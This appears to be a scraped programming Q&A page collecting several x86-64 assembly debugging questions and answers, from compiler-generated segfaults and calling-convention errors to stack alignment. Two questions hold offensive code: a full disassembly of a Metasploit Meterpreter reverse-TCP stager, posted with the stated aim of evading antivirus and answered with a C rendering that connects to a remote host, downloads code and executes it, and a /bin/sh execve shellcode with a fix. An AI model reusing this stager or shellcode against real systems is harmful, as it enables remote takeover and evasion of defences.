Segmentation fault after function call in x86 assembly - debugging

I'm currently writing a compiler and I have created some tests and only one of them fails with Segmentation fault (core dumped) as error message.
This is the code that gets compiled
function main(): int {
var f: int = 10;
return func(f) - func(f / 2);
}
function func(a: int): int {
return a;
}
And this is the generated assembly code (it's not really optimized as you can see)
section .text
global _start
_start:
call function_main
mov rdi, rax
mov rax, 60
syscall
global function_main
function_main:
push rbp
mov rbp, rsp
sub rsp, 4
mov rax, 10
mov DWORD[rbp-0], eax
mov eax, DWORD[rbp-0]
mov rdi, rax
call function_func
push rax
mov eax, DWORD[rbp-0]
mov rbx, 2
idiv rbx
mov rdi, rax
call function_func
mov rbx, rax
pop rax
sub rax, rbx
mov rsp, rbp
pop rbp
ret
global function_func
function_func:
push rbp
mov rbp, rsp
sub rsp, 4
mov DWORD[rbp-0], edi
mov eax, DWORD[rbp-0]
mov rsp, rbp
pop rbp
ret
The assembly file is compiled with nasm -f elf64 ./test9.lv.asm -o ./test9.lv.asm.o and ld -g ./test9.lv.asm.o a.out
I've used gdb to debug the binary file and it seems like the program receives the SIGSEGV signal right after func(f) returns the first time.
But now I don't know why this is happening in this case.

Related

What is wrong with my implementation of the Lisp "cons" function?

I am trying to make the Lisp function cons in x86_84 assembly on MacOS. Below I am trying to make a pair of 2 and 3, but it is not working; I am getting a segmentation fault.
.global _main
.extern _malloc
.text
.macro make_node register
mov rdi, 8 # 64-bit number
call _malloc # failed on malloc
mov [rax], \register # contents of register in address of rax
mov \register, [rax]
.endm
cons:
push rbp
mov rbp, rsp
mov r8, [rbp + 16]
make_node r8
mov r9, [rbp + 24]
make_node r9
mov rsp, rbp
pop rbp
ret
_main:
push 3
push 2
call cons
add rsp, 16
# I should now be able to do whatever I want with r8 (2) and r9 (3)
mov rdi, 0
mov rax, 0x2000001
syscall
I stepped through it with GDB and I see that it failed on calling malloc, but to me, there doesn't seem to be a problem since malloc only takes one argument (the number of bytes to allocate) in the rdi register.
Dump of assembler code for function cons:
0x0000000100003f48 <+0>: push %rbp
0x0000000100003f49 <+1>: mov %rsp,%rbp
0x0000000100003f4c <+4>: mov 0x10(%rbp),%r8
0x0000000100003f50 <+8>: mov $0x8,%rdi
=> 0x0000000100003f57 <+15>: callq 0x100003f96
0x0000000100003f5c <+20>: mov %r8,(%rax)
0x0000000100003f5f <+23>: mov (%rax),%r8
0x0000000100003f62 <+26>: mov 0x18(%rbp),%r9
0x0000000100003f66 <+30>: mov $0x8,%rdi
0x0000000100003f6d <+37>: callq 0x100003f96
0x0000000100003f72 <+42>: mov %r9,(%rax)
0x0000000100003f75 <+45>: mov (%rax),%r9
0x0000000100003f78 <+48>: mov %rbp,%rsp
0x0000000100003f7b <+51>: pop %rbp
0x0000000100003f7c <+52>: retq
End of assembler dump.
(gdb) ni
Thread 2 received signal SIGSEGV, Segmentation fault.
I am assembling on a Mac like this: clang -masm=intel cell.asm.
Does anyone familiar with x86 assembly know the source of my error?
(Also, in case anyone asks, I know that it's important to call free after malloc but this code is the only code necessary to demonstrate my problem.)

Generated assembly for extended alignment of stack variables [duplicate]

This question already has answers here:
Trying to understand gcc's complicated stack-alignment at the top of main that copies the return address
(3 answers)
Why is GCC pushing an extra return address on the stack?
(2 answers)
What's up with gcc weird stack manipulation when it wants extra stack alignment?
(1 answer)
Closed 3 years ago.
I was digging into the assembly of code that was using extended alignment for a stack-based variable. This is a smaller version of the code
struct Something {
Something();
};
void foo(Something*);
void bar() {
alignas(128) Something something;
foo(&something);
}
This, when compiled with clang 8.0 generates the following code (https://godbolt.org/z/lf8WW-)
bar(): # #bar()
push rbp
mov rbp, rsp
and rsp, -128
sub rsp, 128
mov rdi, rsp
call Something::Something() [complete object constructor]
mov rdi, rsp
call foo(Something*)
mov rsp, rbp
pop rbp
ret
And earlier versions of gcc produce the following (https://godbolt.org/z/LLQ8gW). Starting gcc 8.1, both produce the same code
bar():
lea r10, [rsp+8]
and rsp, -128
push QWORD PTR [r10-8]
push rbp
mov rbp, rsp
push r10
sub rsp, 232
lea rax, [rbp-240]
mov rdi, rax
call Something::Something() [complete object constructor]
lea rax, [rbp-240]
mov rdi, rax
call foo(Something*)
nop
add rsp, 232
pop r10
pop rbp
lea rsp, [r10-8]
ret
I'm not too familiar with x86 and just out of curiosity - what exactly is happening here in both pieces of code? Does the compiler pull tricks like std::align() and round up the current stack position to a multiple of 128 for the on-stack variable something?
Nothing magical here. Line-by-line:
bar(): # #bar()
push rbp ; preserve base pointer
mov rbp, rsp ; set base poiner
and rsp, -128 ; Anding with -128 aligns it on 128 boundary
sub rsp, 128 ; incrementing stack grows down, incrementing it gives us the space for new object
mov rdi, rsp ; address of the new (future) object is passed as an argument to the constructor, in %RDI
call Something::Something() [complete object constructor] # call constructor
mov rdi, rsp ; callee might have changed %RDI, so need to restore it
call foo(Something*) ; calling a function given it address of fully constructed object
mov rsp, rbp ; restore stack pointer
pop rbp ; restore base pointer
ret

X64 ASSEMBLY - Cannot run compiled and linked raw shellcode in Windows

After using metasploit's windows/x64/meterpreter/reverse_tcp shellcode on my windows 10 machine (with AVs turned off), I decided to try to create a hand-made polymorphic, null-free and custom-encoded version of the same shellcode (with the hope of evading my AVs).
To test my work flow, I produced a raw output of the shellcode using:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -a x64 --platform windows LHOST='my IP address' | ndisasm -b 64 -
global _start
section .text
_start:
cld
and rsp,byte -0x10
call first_call ;dword 0xd6
push r9
push r8
push rdx
push rcx
push rsi
xor rdx,rdx
mov rdx,[gs:rdx+0x60]
mov rdx,[rdx+0x18]
mov rdx,[rdx+0x20]
fifth_jmp:
mov rsi,[rdx+0x50]
movzx rcx,word [rdx+0x4a]
xor r9,r9
xor rax,rax
lodsb
cmp al,0x61
jl 0x37
sub al,0x20
ror r9d,0xd
add r9d,eax
loop 0x2d
push rdx
push r9
mov rdx,[rdx+0x20]
mov eax,[rdx+0x3c]
add rax,rdx
cmp word [rax+0x18],0x20b
jnz first_jmp ;dword 0xcb
mov eax,[rax+0x88]
test rax,rax
jz first_jmp ;0xcb
add rax,rdx
push rax
mov ecx,[rax+0x18]
mov r8d,[rax+0x20]
add r8,rdx
fourth_jmp:
jrcxz second_jmp ;0xca
dec rcx
mov esi,[r8+rcx*4]
add rsi,rdx
xor r9,r9
third_jmp:
xor rax,rax
lodsb
ror r9d,0xd
add r9d,eax
cmp al,ah
jnz third_jmp
add r9,[rsp+0x8]
cmp r9d,r10d
jnz fourth_jmp ;0x72
pop rax
mov r8d,[rax+0x24]
add r8,rdx
mov cx,[r8+rcx*2]
mov r8d,[rax+0x1c]
add r8,rdx
mov eax,[r8+rcx*4]
add rax,rdx
pop r8
pop r8
pop rsi
pop rcx
pop rdx
pop r8
pop r9
pop r10
sub rsp,byte +0x20
push r10
jmp rax
second_jmp:
pop rax
first_jmp:
pop r9
pop rdx
mov rdx,[rdx]
jmp dword fifth_jmp ;0x21
first_call:
pop rbp
mov r14,0x32335f327377
push r14
mov r14,rsp
sub rsp,0x1a0
mov r13,rsp
mov r12,0x6900a8c05c110002
push r12
mov r12,rsp
mov rcx,r14
mov r10d,0x726774c
call rbp
mov rdx,r13
push dword 0x101
pop rcx
mov r10d,0x6b8029
call rbp
push byte +0x5
pop r14
ninth_jmp:
push rax
push rax
xor r9,r9
xor r8,r8
inc rax
mov rdx,rax
inc rax
mov rcx,rax
mov r10d,0xe0df0fea
call rbp
mov rdi,rax
sixth_jmp:
push byte +0x10
pop r8
mov rdx,r12
mov rcx,rdi
mov r10d,0x6174a599
call rbp
test eax,eax
jz 0x15e
dec r14
jnz sixth_jmp ;0x13e
call second_call ;dword 0x1f1
sub rsp,byte +0x10
mov rdx,rsp
xor r9,r9
push byte +0x4
pop r8
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jng seventh_jmp ;0x1d1
add rsp,byte +0x20
pop rsi
mov esi,esi
push byte +0x40
pop r9
push dword 0x1000
pop r8
mov rdx,rsi
xor rcx,rcx
mov r10d,0xe553a458
call rbp
mov rbx,rax
mov r15,rax
tenth_jmp:
xor r9,r9
mov r8,rsi
mov rdx,rbx
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jnl eighth_jmp ;0x1e3
pop rax
push r15
pop rcx
push dword 0x4000
pop r8
push byte +0x0
pop rdx
mov r10d,0x300f2f0b
call rbp
seventh_jmp:
push rdi
pop rcx
mov r10d,0x614d6e75
call rbp
dec r14
jmp ninth_jmp ;0x11f
eighth_jmp:
add rbx,rax
sub rsi,rax
test rsi,rsi
jnz tenth_jmp ;0x1a2
jmp r15
second_call:
pop rax
push byte +0x0
pop rcx
mov r10,0x56a2b5f0
call rbp
Before making any changes to the ndisasm output (apart from modifying the call and jmp destinations from relative addresses to labels, see code above), I compiled and linked the output using:
nasm -f win64 -o meterpreter_reverse_tcp.o meterpreter_reverse_tcp.asm
/opt/mingw/x86_64-w64-mingw32/bin/ld -o meterpreter_reverse_tcp.exe meterpreter_reverse_tcp.o
But when I ran the .exe on my windows 10 machine, I got the following error:
Meterpreter_reverse_tcp.exe has stopped working. A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
The output of the command 'file meterpreter_reverse_tcp.exe' is:
meterpreter_reverse_tcp.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
What did I do wrong ?
your shell code if convert it to c/c++ is next:
LoadLibraryA("ws2_32");
WSADATA wd;
WSAStartup(MAKEWORD(1,1), &wd);
loop:
SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
SOCKADDR_IN sa = { AF_INET, _byteswap_ushort(4444) };
sa.sin_addr.s_addr = IP(192, 168, 0, 105);
// try 5 times connect to 192.168.0.105
int n = 5;
do
{
if (connect(s, (sockaddr*)&sa, sizeof(SOCKADDR_IN)) == NOERROR)
{
// we connected
break;
}
} while (--n);
ExitProcess(0);// !! error in shellcode or special damaged ?
ULONG len;
// get the length of shellcode
if (0 < recv(s, (char*)&len, sizeof(len), 0))
{
// allocate buffer for shellcode
PVOID pv = VirtualAlloc(0, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* buf = (char*)pv;
// download shellcode in loop
do
{
if (0 > (n = recv(s, buf, len, 0)))
{
// download fail
// bug !!
// must be MEM_RELEASE for free memory, but used MEM_DECOMMIT in code.
VirtualFree(pv, 0, MEM_DECOMMIT);
closesocket(s);
goto loop;
}
} while (buf += n, len -= n);
// all shellcode downloaded
// call it
((FARPROC)pv)();
}
ExitProcess(0);
it i be say worked under debugger. if something not worked for you - debug it. especially put bp on jmp rax - the begin of shell code is function which search for exported api (by hash) and call it (jmp rax)

Loading "/bin/sh" into a register

I'm trying to write ASM code to spawn a shell.
I've figured out that the syscall number for __execve is 0x3b or 59.
I need to send "/bin/sh" as the first parameter, a pointer to {"/bin/sh", NULL} as the second parameter and NULL as the third parameter.
By the convetions of x86_64 ASM on the Intel architecture - the first parameter is written into the RDI register, the second parameter is written into the RSI register and the final parameter is written into the RDX register.
This is my code:
global _start
section .text
_start:
jmp message
mystart:
xor rax, rax
push rax
push rax
pop rdx ; third parameter - NULL
pop rdi ; first parameter - "/bin/sh"
mov rax, rdi
push rax
push rsp
pop rsi ; second parameter - pointer to {"/bin/sh", NULL}
xor rax, rax
mov al, 0x3b
syscall
xor rax, rax
mov al, 0x3c
xor rdi, rdi
mov dil, 0x0a
syscall
message:
call mystart
db "/bin/sh"
section .data
I use the following instructions to compile and link the code.
yasm -f elf64 shell.asm -o shell.o
ld -o shell.out shell.o
The GDB dump of the _start function is as follows:
Dump of assembler code for function _start:
0x0000000000400080 <+0>: jmp 0x4000a3 <_start+35>
0x0000000000400082 <+2>: xor rax,rax
0x0000000000400085 <+5>: push rax
0x0000000000400086 <+6>: push rax
0x0000000000400087 <+7>: pop rdx
0x0000000000400088 <+8>: pop rdi
0x0000000000400089 <+9>: mov rax,rdi
0x000000000040008c <+12>: push rax
0x000000000040008d <+13>: push rsp
0x000000000040008e <+14>: pop rsi
0x000000000040008f <+15>: xor rax,rax
0x0000000000400092 <+18>: mov al,0x3b
0x0000000000400094 <+20>: syscall
0x0000000000400096 <+22>: xor rax,rax
0x0000000000400099 <+25>: mov al,0x3c
0x000000000040009b <+27>: xor rdi,rdi
0x000000000040009e <+30>: mov dil,0xa
---Type <return> to continue, or q <return> to quit---
0x00000000004000a1 <+33>: syscall
0x00000000004000a3 <+35>: call 0x400082 <_start+2>
0x00000000004000a8 <+40>: pop rsp
0x00000000004000a9 <+41>: (bad)
0x00000000004000aa <+42>: (bad)
0x00000000004000ab <+43>: .byte 0x69
0x00000000004000ac <+44>: outs dx,BYTE PTR ds:[rsi]
0x00000000004000ad <+45>: pop rsp
0x00000000004000ae <+46>: (bad)
0x00000000004000af <+47>: jae 0x400119
As you can see the (bad) instructions are caused by db "/bin/sh", what is wrong with this string? What is a (bad) instruction? How do I debug such problems in the future?
① You cannot load a string into a register, only a pointer to a string.
② Your stack magic is merely wrong. Move one of the doubled push rax to just below pop rdi, and the program works for me.

x64 asm ret lands in no mans land

I assumed I had push'ed something without popping it, or vice versa, but I can't find anything wrong! I write to the console with a call to a dll that links properly, and I inexplicably am in no mans land... (address 0x0000000000000000)
I've put some sleeps in, and I'm sure that the api call WriteConsoleA is returning. It's on my last ret under the print function.
Any ideas?
.exe:
extern FreeConsole
extern Sleep
extern ExitProcess
extern print
extern newconsole
extern strlen
section .data BITS 64
title: db 'Consolas!',0
message: db 'Hello, world',0,0
section .text bits 64
global Start
Start:
mov rcx, title
call newconsole
mov rcx, 1000
call Sleep
mov rcx, message
call print
mov rcx, 10000
call Sleep
call FreeConsole
xor rcx, rcx
call ExitProcess
.dll:
extern AllocConsole
extern SetConsoleTitleA
extern GetStdHandle
extern WriteConsoleA
extern Sleep
export newconsole
export strlen
export print
section .data BITS 64
console.writehandle: dq 0
console.readhandle: dq 0
console.write.result: dq 0
section .text BITS 64
global strlen
strlen:
push rax
push rdx
push rdi
mov rdi, rcx
xor rax, rax
mov rcx, dword -1
cld
repnz scasb
neg rcx
sub rcx, 2
pop rdi
pop rdx
pop rax
ret
global print
print:
mov rbp, rsp
push rcx
call strlen
mov r8, rcx
pop rdx
mov rcx, [console.writehandle]
mov r9, console.write.result
push qword 0
call WriteConsoleA
ret
global newconsole
newconsole:
push rax
push rcx
call AllocConsole
pop rcx
call SetConsoleTitleA
mov rcx, -11
call GetStdHandle
mov [console.writehandle], rax
pop rax
ret
I assume you're talking about this function:
global print
print:
mov rbp, rsp
push rcx
call strlen
mov r8, rcx
pop rdx
mov rcx, [console.writehandle]
mov r9, console.write.result
push qword 0
call WriteConsoleA
ret
The x64 ABI requires that stack space is reserved even for parameters passed in registers. WriteConsoleA is free to use those stack locations for whatever it wants - so you need to make sure that you've adjusted the stack appropriately. As it stands, you're pushing only the last reserved pointer parameter. I think something like the following will do the trick for you:
push qword 0
sub rsp, 4 * 8 // reserve stack for register parameters
call WriteConsoleA
mov rsp, rbp // restore rsp
ret
See http://msdn.microsoft.com/en-us/library/ms235286.aspx (emphasis added):
The x64 Application Binary Interface (ABI) is a 4 register fast-call calling convention, with stack-backing for those registers.
...
The caller is responsible for allocating space for parameters to the callee, and must always allocate sufficient space for the 4 register parameters, even if the callee doesn’t have that many parameters.
According to calling convention, you have to clean up arguments you put on the stack. In this case that applies to the 5th argument to WriteConsoleA. Since you have a copy of original rsp in rbp, you can reload rsp from rbp, or just add 8 after the call.

Resources